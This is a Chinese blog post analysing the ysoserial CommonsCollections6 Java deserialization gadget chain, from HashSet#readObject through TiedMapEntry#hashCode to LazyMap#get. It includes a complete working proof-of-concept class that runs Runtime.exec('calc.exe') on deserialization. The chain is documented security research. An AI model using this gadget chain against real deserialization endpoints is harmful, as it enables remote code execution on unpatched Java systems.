ysoserial CommonsColletions6分析
CC6的话是一条比较通用的链,在JAVA7和8版本都可以使用,而触发点也是通过LazyMap的get方法。
TiedMapEntry#hashCode
在CC5中,通过的是TiedMapEntry的toString调用到的LazyMap的get方法,而CC6则是通过TiedMapEntry的hashCode方法
此处hashCode会调用getValue方法,getValue就调用到了LazyMap的get方法
接下来我们要找的就是哪里调用了TiedMapEntry#hashCode
HashMap#put
HashMap每次进行put的时候,会计算 key的hash值
进入到hash方法,看到调用了hashcode
hashSet#readObject
hashSet作为反序列化入口,在重写的readObject中调用了map.put
此处的map是在readObject中第299-301行进行的赋值
这个代码其实判断this是不是LinkedHashSet,不是的话就返回HashMap类型的对象
综合以上,map值为HashMap即可调用put
构造poc
前面的写法都一样,lazyMap传入了TiedMapEntry中
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
};
ChainedTransformer chain = new ChainedTransformer(transformers);
HashMap hashMap = new HashMap();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap, chain);
TiedMapEntry mapEntry = new TiedMapEntry(lazyMap, "xxx");
通过hashSet.add把mapEntry加入进hashSet
HashSet hashSet = new HashSet(1);
hashSet.add(mapEntry);
到这里就已经构造完了,但是会发现poc在执行反序列化的时候无法弹出计算器,原因是在LazyMap的get方法中
这句话的意思是判断有没有key,有key的话则不会执行if里面的方法。
查找key传入路径发现,这里的key是在TiedMapEntry#getValue中传入的
而这个key则是在构造方法中进行的赋值
也就是之前操作时候,传入的"xxx"
由于在hashSet.add的时候,会调用一遍TiedMapEntry#getValue把key传入了进去
所以我们只需要在add之后,把lazyMap里面的key给remove就可以了
整个POC就构造出来了
public class payload01 {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
};
ChainedTransformer chain = new ChainedTransformer(transformers);
HashMap hashMap = new HashMap();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap, chain);
TiedMapEntry mapEntry = new TiedMapEntry(lazyMap, "xxx");
HashSet hashSet = new HashSet(1);
hashSet.add(mapEntry);
lazyMap.remove("xxx");
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(hashSet);
oos.close();
// System.out.println(barr);
// System.out.println(barr.toString());
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
ois.readObject();
}
}
和CC5一样,如果要在CommonsCollections4.0版本中使用的话,需要把poc中的lazymap传值方式改变下就行了!
测试环境在JDK1.7和1.8,CommonsCollections3.1-3.21,4.0均测试成功
最新文章
- ORACLE 利用 REPLACE函数替换字段字符串
- 前端学PHP之字符串函数
- ServletContext中常用方法介绍
- socket编程中客户端常用函数 以及简单实现
- Bete冲刺第四阶段
- .NET开源项目常用记录
- nginx+php出现502 不能解析
- 基于vs2005以上版本Qt程序发布的注意事项(讲了manifest的问题)
- c# 进行AE开发时,如何在地图上定位出一个点
- java_泛型(构造器)部分实例
- jquery选择指定元素之外的所有元素
- STM32采集电阻触摸贴膜
- vue中组件的四种方法总结
- 班级博客客户端Beta阶段发布说明
- 【朝花夕拾】Android性能篇之(七)Android跨进程通信篇
- Docker指令
- 第 8 章 容器网络 - 063 - 如何使用 Weave 网络?
- How to make a USB stick use ISO image file in debian
- tomcat服务器宕机解决方案
- PHP-fpm启动时 出现 PHP Warning: PHP Startup: Invalid library (maybe not a PHP library) 'fileinfo.so' in Unknown on line 0